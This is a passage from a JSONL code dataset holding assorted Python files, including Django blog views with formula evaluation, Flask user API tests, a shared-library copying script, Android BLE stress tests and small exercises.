)\n cpApp( jobs , file_paths[ i ] )\n","sub_path":"RPQCp.py","file_name":"RPQCp.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"556070206","text":"'''\nCreated on 22/05/2013\n\n@author: amucci\n'''\nfrom admin.utils.views.generic import AdminWidgetTemplateFormView\nfrom admin.widgets.engine.forms import WidgetsHtmlAddForm\nfrom admin.widgets.engine.models import WidgetHtml\nfrom engine.models import InstalledWidgets\nclass Admin_Widgets_Engine_HtmlController(AdminWidgetTemplateFormView):\n\n template_name = \"menu/add.html\"\n form_class = WidgetsHtmlAddForm\n \n \n def get_widget_initial(self):\n q = WidgetHtml.all()\n q.filter(\"installed_widget =\", InstalledWidgets.get_by_id(int(self.request.GET.get('id'))))\n result = q.get()\n if result is not None:\n return {'body': result.body}\n else:\n return {}\n \n def form_valid(self, form):\n widget_html = WidgetHtml.all().filter(\"installed_widget =\", InstalledWidgets.get_by_id(int(self.request.GET.get('id')))).get()\n if widget_html is not None:\n widget_html.body = form.cleaned_data['body']\n widget_html.installed_widget = InstalledWidgets.get_by_id(int(self.request.GET.get('id')))\n else:\n widget_html = WidgetHtml(installed_widget=InstalledWidgets.get_by_id(int(self.request.GET.get('id'))), body=form.cleaned_data['body'])\n widget_html.put()\n return super(Admin_Widgets_Engine_HtmlController, self).form_valid(form)","sub_path":"admin/widgets/engine/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"298309105","text":"import json\nimport unittest\n\nfrom models import User\nfrom models.abc import db\nfrom repositories import UserRepository\nfrom server import server\n\n\nclass TestUser(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.client = server.test_client()\n\n def setUp(self):\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_get(self):\n \"\"\" The GET on `/user` should return an user \"\"\"\n user = UserRepository.create(first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])\n response = self.client.get(\"/application/user/{}\".format(user.id))\n\n self.assertEqual(response.status_code, 200)\n response_json = json.loads(response.data.decode(\"utf-8\"))\n self.assertEqual(\n response_json,\n {\"user\": dict(user_id=user.id,\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])},\n )\n\n def test_create(self):\n \"\"\" The POST on `/user` should create an user \"\"\"\n response = self.client.post(\n \"/application/user/Doe/John\",\n content_type=\"application/json\",\n data=json.dumps(dict(\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])),\n )\n\n self.assertEqual(response.status_code, 200)\n response_json = json.loads(response.data.decode(\"utf-8\"))\n self.assertEqual(\n response_json,\n {\"user\": dict(user_id=response_json[\"user\"][\"user_id\"],\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])},\n )\n self.assertEqual(User.query.count(), 1)\n\n def test_update(self):\n \"\"\" The PUT on `/user` should update an user's info\"\"\"\n user = UserRepository.create(first_name=\"John\", last_name=\"Doe\")\n response = self.client.put(\n \"/application/user/{}\".format(user.id),\n content_type=\"application/json\",\n data=json.dumps(dict(\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])),\n )\n\n self.assertEqual(response.status_code, 200)\n response_json = json.loads(response.data.decode(\"utf-8\"))\n self.assertEqual(\n response_json,\n {\"user\": dict(user_id=user.id,\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])},\n )\n user = UserRepository.get(user_id=user.id)\n self.assertEqual(user.first_name, \"John\")\n","sub_path":"test/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"57241549","text":"#/usr/bin/env python\n\nimport os\nfrom optparse import OptionParser\nfrom sys import platform as platform_\nimport string\n\nif __name__ == \"__main__\":\n\n\tparser = OptionParser()\n\tparser.add_option(\"-t\", \"--target\",\n\t\t\t\t\tdest=\"target\",\n\t\t\t\t\thelp=\"Path to target (REQUIRED).\")\n\tparser.add_option(\"-d\", \"--directory\",\n\t\t\t\t\tdest=\"directory\",\n\t\t\t\t\thelp=\"Output directory (REQUIRED).\")\n\tparser.add_option(\"-k\", \"--keyword\",\n\t\t\t\t\tdest=\"keyword\",\n\t\t\t\t\thelp=\"Only take dependencies with this keyword.\")\n\t(options, args) = parser.parse_args()\n\n\tif not options.target:\n\t\tparser.error(\"target not given.\")\n\tif not options.directory:\n\t\tparser.error(\"directory not given.\")\n\tif not options.keyword:\n\t\tkeyword = \"\"\n\telse:\n\t\tkeyword = options.keyword\n\n\n\tif platform_ == \"linux\" or platform_ == \"linux2\":\n\t\tdep = \"ldd\"\n\telse:\n\t\tdep = \"otool -L\"\n\n\tresult = os.popen(dep + \" \" + options.target).read()\n\tresult = string.split(result, \"\\n\")\n\n\tfor r in result:\n\n\t\tif platform_ == \"linux\" or platform_ == \"linux2\":\n\t\t\ta = r.find(\">\") + 2\n\t\t\tb = r.find(\"(\") - 1\n\t\telse:\n\t\t\ta = r.find(\"/\")\n\t\t\tb = r.find(\"(\") - 1\n\n\t\tif a < 0 or b < 0:\n\t\t\tcontinue\n\n\t\tdep_name = r[a:b]\n\t\t\n\t\tif dep_name.find(keyword) != -1:\n\t\t\tos.system(\"cp \" + dep_name + \" \" + options.directory)\n\n\n\n","sub_path":"GrabLibs.py","file_name":"GrabLibs.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"150303103","text":"import ael, datetime\n\np_list = []\nfor p in ael.Price.select('day = \"2009-06-26\"'):\n if p.ptynbr.ptyid == 'internal':\n #if p.insaddr.insid == 'ZAR/SHP':\n tup = (p.prinbr, p.day)\n p_list.append(tup)\n \n\nfor l in p_list:\n x = l[0]\n new_p = ael.Price[x].new()\n new_p.day = l[1].add_days(2)\n try:\n new_p.commit()\n except:\n print('cannot commit price for ', new_p.insaddr.insid)\n\n\n\n\n\n","sub_path":"Python modules/as_update_internal_prices2.py","file_name":"as_update_internal_prices2.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"60404436","text":"#encoding: UTF-8\n\n# Autor: Leonardo Castillejos Vite A01375332\n# Descripcion: Un programa que a partir del número de hombres y mujeres da el total de alumnos y porcentaje de hombres y mujeres en la clase\n# A partir de aquí escribe tu programa\n\nmujeresins = int(input(\"Escriba el número de alumnas inscritas \"))\nhombresins = int(input(\"Escriba el número de alumnos inscritos \"))\ntotalins = mujeresins + hombresins\nporcenm = (mujeresins / totalins)*100\nporcenh = (hombresins / totalins)*100\nprint(\"Total de alumnos\", totalins)\nprint(\"Porcentaje de hombres \", porcenh, \"%\", sep=\"\")\nprint(\"Porcentaje de mujeres \", porcenm, \"%\", sep=\"\")","sub_path":"porcentajes.py","file_name":"porcentajes.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220046452","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Author: MatthewP\n# @Date: 12/3/2018\n# @Email: matthewhakka@gmail.com\n\nimport requests\n\nr = requests.get('https://github.com/requests/requests/')\nfor key, value in r.cookies.items():\n print(key + '=' + value)","sub_path":"spyde/requests/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"363590375","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0024_auto_20150820_0156'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='is_paid_manually',\n field=models.BooleanField(default=False, verbose_name='оплачен вручную'),\n ),\n migrations.AddField(\n model_name='order',\n name='is_paid_total',\n field=models.NullBooleanField(editable=False, verbose_name='предоплачен'),\n ),\n migrations.AlterField(\n model_name='order',\n name='is_paid',\n field=models.NullBooleanField(editable=False, verbose_name='оплачен автоматически'),\n ),\n ]\n","sub_path":"shop/migrations/0025_auto_20150909_2236.py","file_name":"0025_auto_20150909_2236.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142360911","text":"#/usr/bin/env python3.4\n#\n# Copyright (C) 2016 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\"\"\"\nOnLost onFound Stress Test.\n\"\"\"\n\nimport threading\nimport time\n\nfrom queue import Empty\nfrom acts.test_utils.bt.BluetoothBaseTest import BluetoothBaseTest\nfrom acts.test_utils.bt.BleEnum import AdvertiseSettingsAdvertiseMode\nfrom acts.test_utils.bt.BleEnum import ScanSettingsCallbackType\nfrom acts.test_utils.bt.BleEnum import ScanSettingsScanMode\nfrom acts.test_utils.bt.BleEnum import ScanSettingsMatchMode\nfrom acts.test_utils.bt.BleEnum import ScanSettingsMatchNum\nfrom acts.test_utils.bt.bt_test_utils import cleanup_scanners_and_advertisers\nfrom acts.test_utils.bt.bt_test_utils import get_advanced_droid_list\nfrom acts.test_utils.bt.bt_gatt_utils import orchestrate_gatt_connection\nfrom acts.test_utils.bt.bt_test_utils import reset_bluetooth\nfrom acts.test_utils.bt.bt_gatt_utils import run_continuous_write_descriptor\nfrom acts.test_utils.bt.bt_gatt_utils import setup_multiple_services\n\n\nclass BleOnLostOnFoundStressTest(BluetoothBaseTest):\n default_timeout = 10\n max_scan_instances = 28\n report_delay = 2000\n active_scan_callback_list = []\n active_adv_callback_list = []\n scan_result = \"BleScan{}onScanResults\"\n batch_scan_result = \"BleScan{}onBatchScanResult\"\n\n def __init__(self, controllers):\n BluetoothBaseTest.__init__(self, controllers)\n self.droid_list = get_advanced_droid_list(self.android_devices)\n self.scn_ad = self.android_devices[0]\n self.adv_ad = self.android_devices[1]\n if self.droid_list[1]['max_advertisements'] == 0:\n self.tests = ()\n return\n\n def teardown_test(self):\n cleanup_scanners_and_advertisers(\n self.scn_ad, self.active_adv_callback_list, self.scn_ad,\n self.active_adv_callback_list)\n self.active_adv_callback_list = []\n self.active_scan_callback_list = []\n\n def on_exception(self, test_name, begin_time):\n reset_bluetooth(self.android_devices)\n\n def _start_generic_advertisement_include_device_name(self):\n self.adv_ad.droid.bleSetAdvertiseDataIncludeDeviceName(True)\n self.adv_ad.droid.bleSetAdvertiseSettingsAdvertiseMode(\n AdvertiseSettingsAdvertiseMode.ADVERTISE_MODE_LOW_LATENCY.value)\n advertise_data = self.adv_ad.droid.bleBuildAdvertiseData()\n advertise_settings = self.adv_ad.droid.bleBuildAdvertiseSettings()\n advertise_callback = self.adv_ad.droid.bleGenBleAdvertiseCallback()\n self.adv_ad.droid.bleStartBleAdvertising(\n advertise_callback, advertise_data, advertise_settings)\n self.adv_ad.ed.pop_event(\n \"BleAdvertise{}onSuccess\".format(advertise_callback),\n self.default_timeout)\n self.active_adv_callback_list.append(advertise_callback)\n return advertise_callback\n\n def _verify_no_events_found(self, event_name):\n try:\n self.scn_ad.ed.pop_event(event_name, self.default_timeout)\n self.log.error(\"Found an event when none was expected.\")\n return False\n except Empty:\n self.log.info(\"No scan result found as expected.\")\n return True\n\n def _poll_energy(self):\n import random\n while True:\n self.log.debug(\n self.scn_ad.droid.bluetoothGetControllerActivityEnergyInfo(1))\n time.sleep(2)\n\n @BluetoothBaseTest.bt_test_wrap\n def test_on_star_while_polling_energy_stats(self):\n \"\"\"\n Tests ...\n Steps\n 1: ...\n :return: boolean\n \"\"\"\n thread = threading.Thread(target=self._poll_energy)\n thread.start()\n\n filter_list = self.scn_ad.droid.bleGenFilterList()\n self.scn_ad.droid.bleSetScanFilterDeviceName(\n self.adv_ad.droid.bluetoothGetLocalName())\n self.scn_ad.droid.bleSetScanSettingsScanMode(\n ScanSettingsScanMode.SCAN_MODE_LOW_LATENCY.value)\n self.scn_ad.droid.bleSetScanSettingsCallbackType(\n ScanSettingsCallbackType.CALLBACK_TYPE_FOUND_AND_LOST.value)\n self.scn_ad.droid.bleSetScanSettingsMatchMode(\n ScanSettingsMatchMode.AGGRESIVE.value)\n self.scn_ad.droid.bleSetScanSettingsNumOfMatches(\n ScanSettingsMatchNum.MATCH_NUM_ONE_ADVERTISEMENT.value)\n scan_settings = self.scn_ad.droid.bleBuildScanSetting()\n scan_callback = self.scn_ad.droid.bleGenScanCallback()\n self.scn_ad.droid.bleBuildScanFilter(filter_list)\n self.scn_ad.droid.bleStartBleScan(filter_list, scan_settings,\n scan_callback)\n self.active_scan_callback_list.append(scan_callback)\n on_found_count = 0\n on_lost_count = 0\n from contextlib import suppress\n for x in range(1000):\n adv_callback = (\n self._start_generic_advertisement_include_device_name())\n with suppress(Exception):\n event = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 3)\n if event['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event['data']['CallbackType'] == 4:\n on_lost_count += 1\n self.adv_ad.droid.bleStopBleAdvertising(adv_callback)\n with suppress(Exception):\n event2 = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 4)\n if event2['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event2['data']['CallbackType'] == 4:\n on_lost_count += 1\n thread.join()\n return True\n\n @BluetoothBaseTest.bt_test_wrap\n def test_more_stress_test(self):\n gatt_server_callback, gatt_server = setup_multiple_services(\n self.adv_ad)\n bluetooth_gatt, gatt_callback, adv_callback = (\n orchestrate_gatt_connection(self.scn_ad, self.adv_ad))\n self.active_scan_callback_list.append(adv_callback)\n if self.scn_ad.droid.gattClientDiscoverServices(bluetooth_gatt):\n event = self.scn_ad.ed.pop_event(\n \"GattConnect{}onServicesDiscovered\".format(bluetooth_gatt),\n self.default_timeout)\n discovered_services_index = event['data']['ServicesIndex']\n else:\n self.log.info(\"Failed to discover services.\")\n return False\n services_count = self.scn_ad.droid.gattClientGetDiscoveredServicesCount(\n discovered_services_index)\n thread = threading.Thread(\n target=run_continuous_write_descriptor,\n args=(self.scn_ad.droid, self.scn_ad.ed, self.adv_ad.droid,\n self.adv_ad.ed, gatt_server, gatt_server_callback,\n bluetooth_gatt, services_count, discovered_services_index))\n thread.start()\n thread2 = threading.Thread(target=self._poll_energy)\n thread2.start()\n\n filter_list = self.scn_ad.droid.bleGenFilterList()\n self.scn_ad.droid.bleSetScanFilterDeviceName(\n self.adv_ad.droid.bluetoothGetLocalName())\n self.scn_ad.droid.bleSetScanSettingsScanMode(\n ScanSettingsScanMode.SCAN_MODE_LOW_LATENCY.value)\n self.scn_ad.droid.bleSetScanSettingsCallbackType(\n ScanSettingsCallbackType.CALLBACK_TYPE_FOUND_AND_LOST.value)\n self.scn_ad.droid.bleSetScanSettingsMatchMode(\n ScanSettingsMatchMode.AGGRESIVE.value)\n self.scn_ad.droid.bleSetScanSettingsNumOfMatches(\n ScanSettingsMatchNum.MATCH_NUM_ONE_ADVERTISEMENT.value)\n scan_settings = self.scn_ad.droid.bleBuildScanSetting()\n scan_callback = self.scn_ad.droid.bleGenScanCallback()\n self.scn_ad.droid.bleBuildScanFilter(filter_list)\n self.scn_ad.droid.bleStartBleScan(filter_list, scan_settings,\n scan_callback)\n self.active_scan_callback_list.append(scan_callback)\n on_found_count = 0\n on_lost_count = 0\n time.sleep(60)\n from contextlib import suppress\n for x in range(1000):\n adv_callback = self._start_generic_advertisement_include_device_name(\n )\n with suppress(Exception):\n event = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 3)\n if event['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event['data']['CallbackType'] == 4:\n on_lost_count += 1\n self.adv_ad.droid.bleStopBleAdvertising(adv_callback)\n with suppress(Exception):\n event2 = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 4)\n if event2['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event2['data']['CallbackType'] == 4:\n on_lost_count += 1\n thread.join()\n thread2.join()\n return True\n","sub_path":"android/tools/test/connectivity/acts/tests/google/ble/system_tests/BleOnLostOnFoundStressTest.py","file_name":"BleOnLostOnFoundStressTest.py","file_ext":"py","file_size_in_byte":9786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"462796374","text":"from django import forms\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views import generic\nfrom .models import Post, Comment\nfrom django_filters import rest_framework as filters\n#中置記法から前置記法へ\ndef infix_to_prefix(INPUTED_TEXT, buffer=[],stack=[]):\n buffer=[]\n for token in INPUTED_TEXT:\n if token == '(' or token == 'c' or token == 's' or token == 't':\n stack.append(token)\n elif token == ')':\n while len(stack) > 0:\n te = stack.pop()\n if te == '(':\n break\n else:\n buffer.append(te)\n if len(stack) > 0:\n if stack[-1] == 'c' or stack[-1] == 's' or stack[-1] == 't':\n buffer.append(stack.pop())\n elif token == '*' or token == '/':\n while len(stack) > 0:\n if stack[-1] == '*' or stack[-1] == '/':\n buffer.append(stack.pop())\n else:\n break\n stack.append(token)\n elif token == '+' or token == '-':\n while len(stack) > 0:\n if stack[-1] == '*' or stack[-1] == '/' or stack[-1] == '+' or stack[-1] == '-':\n buffer.append(stack.pop())\n else:\n break\n stack.append(token)\n else:\n buffer.append(token)\n\n while len(stack) > 0:\n buffer.append(stack.pop())\n return buffer\n#print(INPUTED_TEXT)\n#print(\"\".join(buffer))\n#前置記法から計算結果を出力\ndef RPN(states,parent,children,type):\n '''\n 逆ポーランド記法を計算する関数\n '''\n operator = {\n '+': (lambda x, y: x + y),\n '-': (lambda x, y: x - y),\n '*': (lambda x, y: x * y),\n '/': (lambda x, y: float(x) / y)\n }\n stack = []\n #print('RPN: %s' % states)\n for index, z in enumerate(states):\n if z not in operator.keys():\n if type==0:\n obj = Comment.objects.filter(parent=parent,sub_name=z).first()\n elif type==1:\n obj = Comment.objects.filter(post=parent,sub_name=z).first()\n stack.append(obj.value)\n continue\n y = stack.pop()\n x = stack.pop()\n stack.append(operator[z](x, y))\n #print('%s %s %s =' % (x, z, y))\n #print(stack[0])\n\n #obj = Comment.objects.filter(pk=comment_pk)\n return stack[0]\n\nclass PostList(generic.ListView):\n \"\"\"記事一覧\"\"\"\n model = Post\n\n\nclass PostDetail(generic.DetailView):\n \"\"\"記事詳細\"\"\"\n model = Post\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n #context['result'] = 20000.0\n # どのコメントにも紐づかないコメント=記事自体へのコメント を取得する\n context['comment_list'] = self.object.comment_set.filter(parent__isnull=True)\n with_formula_list = self.object.comment_set.filter(formula__isnull=False).order_by(\"-depth\")\n if len(self.object.comment_set.filter(value__isnull=True, formula__isnull=True))==0:\n try:\n num=len(with_formula_list)\n for i in range(num):\n for fml in with_formula_list:\n children = self.object.comment_set.filter(parent=fml)\n fml.value=RPN(infix_to_prefix(fml.formula),fml,children,0)\n print(fml.value)\n fml.save()\n\n self.object.value = RPN(infix_to_prefix(self.object.formula),self.object.pk,context['comment_list'],1)\n self.object.save()\n except:\n self.object.value=None\n self.object.save()\n else:\n self.object.value=None\n self.object.save()\n #postがvalueを持っていればhtmlに渡して出力\n if self.object.value:\n context['result']=self.object.value\n return context\nclass PostCreate(generic.CreateView):\n model = Post\n fields=[\"title\"]\nclass PostDelete(generic.DeleteView):\n model = Post\n success_url = \"/\"\n\n# コメント、返信フォーム\nCommentForm = forms.modelform_factory(Comment, fields=('text', ))\nclass PostUpdate(forms.ModelForm):\n # create meta class\n class Meta:\n # specify model to be used\n model = Post\n\n # specify fields to be used\n fields = [ \"formula\"]\nclass UpdateForm(forms.ModelForm):\n # create meta class\n class Meta:\n # specify model to be used\n model = Comment\n\n # specify fields to be used\n fields = [ \"formula\"]\nclass UpdateFormNum(forms.ModelForm):\n # create meta class\n class Meta:\n # specify model to be used\n model = Comment\n\n # specify fields to be used\n fields = [ \"value\"]\ndef comment_create(request, post_pk):\n \"\"\"記事へのコメント作成\"\"\"\n post = get_object_or_404(Post, pk=post_pk)\n form = CommentForm(request.POST or None)\n\n if request.method == 'POST':\n comment = form.save(commit=False)\n comment.post = post\n comment.depth = 1\n comment.save()\n return redirect('blog:post_detail', pk=post.pk)\n\n context = {\n 'form': form,\n 'post': post\n }\n return render(request, 'blog/comment_form.html', context)\n\ndef post_update(request, post_pk):\n obj = get_object_or_404(Post, pk=post_pk)\n form = UpdateForm(request.POST or None, instance = obj)\n context = {\n 'form': form,\n }\n context['children'] = Comment.objects.all().filter(post=obj.id, parent__isnull=True)\n dictionary = []\n d=dict()\n for child in context['children']:\n obj_child = get_object_or_404(Comment, post=post_pk,text=child)\n obj_child.sub_name = chr(ord('a')+len(dictionary))\n obj_child.save()\n dictionary.append([chr(ord('a')+len(dictionary))+\":\",child])\n d[chr(ord('a')+len(d))]=child\n context['dict']=dictionary\n if request.method == 'POST':\n form.save()\n fmla = list(str(obj.formula))\n fmla_out=\"\"\n for i in fmla:\n try:\n if d[i]:\n fmla_out=fmla_out+str(d[i])\n except:\n fmla_out=fmla_out+i\n obj.formula_out = fmla_out\n obj.save()\n \"\"\"計算実行\"\"\"\n \"\"\"\n with_value_list = Comment.objects.all().filter(post=post_pk,value__isnull=False)\n for l in with_value_list:\n parent_list = Comment.objects.all().filter(post=post_pk,pk=l)\n \"\"\"\n return redirect('blog:post_detail', pk=obj.pk)\n return render(request, 'blog/formula_update_form.html', context)\n\n\ndef comment_update(request, post_pk, comment_pk):\n obj = get_object_or_404(Comment, pk=comment_pk)\n form = UpdateForm(request.POST or None, instance = obj)\n context = {\n 'form': form,\n }\n context['children'] = Comment.objects.all().filter(parent=comment_pk)\n dictionary = []\n d=dict()\n for child in context['children']:\n obj_child = get_object_or_404(Comment, post=post_pk,text=child)\n obj_child.sub_name = chr(ord('a')+len(dictionary))\n obj_child.save()\n dictionary.append([chr(ord('a')+len(dictionary))+\":\",child])\n d[chr(ord('a')+len(d))]=child\n context['dict']=dictionary\n if request.method == 'POST':\n form.save()\n fmla = list(str(obj.formula))\n fmla_out=\"\"\n for i in fmla:\n try:\n if d[i]:\n fmla_out=fmla_out+str(d[i])\n except:\n fmla_out=fmla_out+i\n obj.formula_out = fmla_out\n obj.save()\n return redirect('blog:post_detail', pk=obj.post.pk)\n return render(request, 'blog/formula_update_form.html', context)\n\n\n\n\ndef comment_update_num(request, post_pk, comment_pk):\n obj = get_object_or_404(Comment, pk=comment_pk)\n form = UpdateFormNum(request.POST or None, instance = obj)\n\n if request.method == 'POST':\n form.save()\n return redirect('blog:post_detail', pk=obj.post.pk)\n\n context = {\n 'form': form\n }\n return render(request, 'blog/num_update_form.html', context)\ndef reply_create(request, comment_pk):\n \"\"\"コメントへの返信\"\"\"\n comment = get_object_or_404(Comment, pk=comment_pk)\n post = comment.post\n form = CommentForm(request.POST or None)\n\n if request.method == 'POST':\n reply = form.save(commit=False)\n reply.parent = comment\n reply.post = post\n reply.depth = reply.parent.depth + 1\n reply.save()\n return redirect('blog:post_detail', pk=post.pk)\n\n context = {\n 'form': form,\n 'post': post,\n 'comment': comment,\n }\n return render(request, 'blog/comment_form.html', context)\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547380525","text":"from two_num_sum import TwoNumSumSlowTest\nfrom two_num_sum import TwoNumSumFastTest\n\ndef testTrueOrFalse(twoNumSum, trueOrFalse, vals):\n for val in vals:\n assert twoNumSum.test(val) is trueOrFalse\n\ntest1 = [1, -2, 3, 6]\ntrues = [4, -1, 9]\nfalses = [10, 5, 0]\n\nslow = TwoNumSumSlowTest()\nslow.store_multiple(test1)\n\ntestTrueOrFalse(slow, True, trues)\ntestTrueOrFalse(slow, False, falses)\n\nfast = TwoNumSumFastTest()\nfast.store_multiple(test1)\n\ntestTrueOrFalse(slow, True, trues)\ntestTrueOrFalse(slow, False, falses)\n\nprint(\"Testing: GOOD\")\n","sub_path":"two_num_sum/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"75833669","text":"import os\nfrom utils import PRODUCED_DATASETS\nfrom utils.IBGETools import pop_ibge\n \n \ndef test_ibge_download():\n path = os.path.join(PRODUCED_DATASETS, 'estimativa_2013_dou_xls.zip')\n if os.path.exists(path):\n os.remove(path)\n df = pop_ibge()\n assert list(df.columns) == ['SIGLA', 'NOME', '2008', '2009', '2010', '2011', '2012',\n '2013', '2014', '2015', '2016', '2017', '2018']\n ","sub_path":"v1/tests/test_IBGETools.py","file_name":"test_IBGETools.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"130067433","text":"def given_word(x, word, case_sensitive = False):\n if case_sensitive:\n term = word.split(x)\n else:\n term = word.lower().split(x.lower())\n result = ''\n valid = ''\n if len(term)<2:\n return 0\n\n valid = term[1]\n if len(term)>2:\n for t in term:\n if t != '' and t[-1] in '1234567890':\n valid = t\n\n for c in valid:\n if c in '1234567890.':\n result = result + c\n else:\n break\n if len(result) == 0:\n return 0\n if '.' in result:\n return float(result)\n return int(result)\n \n\ndef word_by_word(message):\n results = []\n key = ''\n value = ''\n for c in message:\n if c not in '1234567890.':\n if value != '' and key !='':\n type = 'integer'\n if '.' in value:\n try:\n value = float(value)\n except:\n value = 0.0\n type = 'float'\n else:\n value = int(value)\n results.append({ \"key\":key, \"value\":value, \"type\": type})\n value = ''\n key = ''\n key = key + c\n else:\n if key == '':\n value = c\n else:\n value += c\n if key !='':\n type = 'integer'\n if value =='':\n value = 0\n elif '.' in value:\n try:\n value = float(value)\n except:\n value = 0.0\n type = 'float'\n else:\n value = int(value)\n results.append({ \"key\":key, \"value\":value, \"type\": type})\n return results\n\n\ndef print_results(results):\n print('─'*80)\n print(f'{\"KEY\":20}{\"VALUE\":20}TYPE')\n print('─'*80)\n\n for result in results:\n print(f'{result[\"key\"]:20}{str(result[\"value\"]):20}{result[\"type\"]}')\n\n\nif __name__ == \"__main__\":\n message = input(\"Input a string to decode:\")\n decoded = word_by_word(message)\n print_results(decoded)\n\n\n","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446999891","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('',views.base, name='base.html'),\n path('contact/',views.contact, name='contact.html'),\n path('newpost/',views.newpost, name='new-post.html'),\n path('wantajob/',views.wantajob, name='job-post.html'),\n path('login/',views.login, name='login.html'),\n path('signup/',views.signup, name='signup.html'),\n path('register/',views.register, name='signup.html'),\n path('userlogin/',views.userlogin, name='login.html'),\n path('profile/',views.profile, name='profile.html'),\n path('forget/', views.forget, name='forget'),\n path('sendmail/', views.sendmail, name='sendmail'),\n path('confirmm/', views.confirmm, name='confirmm'),\n]\n","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"539588587","text":"# importing webbrowser from python standard library\r\nimport webbrowser\r\n\r\nclass Movie():\r\n \"\"\"A class of Movies\r\n Movie class which store information regarding the movie and then call a method\r\n for showing its trailer\r\n\r\n Attributes:\r\n title = Title of the movie\r\n storyline = Brief storyline for the movie\r\n poster_image_url = URL for a poster image for the movie\r\n trailer_youtube_url = URL for a youtube trailer for the movie\r\n rating = IMDB rating for the movie\r\n \"\"\"\r\n\r\n def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube, imdb_rating):\r\n \"\"\"Inits Movie with variables movie title, movie storyline, poster image,\r\n trailer youtube and imdb rating\"\"\"\r\n self.title = movie_title\r\n self.storyline = movie_storyline\r\n self.poster_image_url = poster_image\r\n self.trailer_youtube_url = trailer_youtube\r\n self.rating = imdb_rating\r\n\r\n def show_trailer(self):\r\n \"\"\"Opens a movies trailer in web browser when is passed the an instance Movie\r\n Args:\r\n Self: The Movie instance foe which to open the movie trailer\r\n Returns:\r\n Opens a movie trailer in web browser\r\n \"\"\"\r\n webbrowser.open(self.trailer_youtube_url)\r\n \r\n","sub_path":"Movie trailer website/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"560138786","text":"#틀렸음 : 에제2 \n# t = int(input())\n# for _ in range(t):\n# stack = []\n# vps = list(input())\n# for s in vps:\n# if s == \"(\":\n# stack.append(1)\n# elif s == \")\":\n# 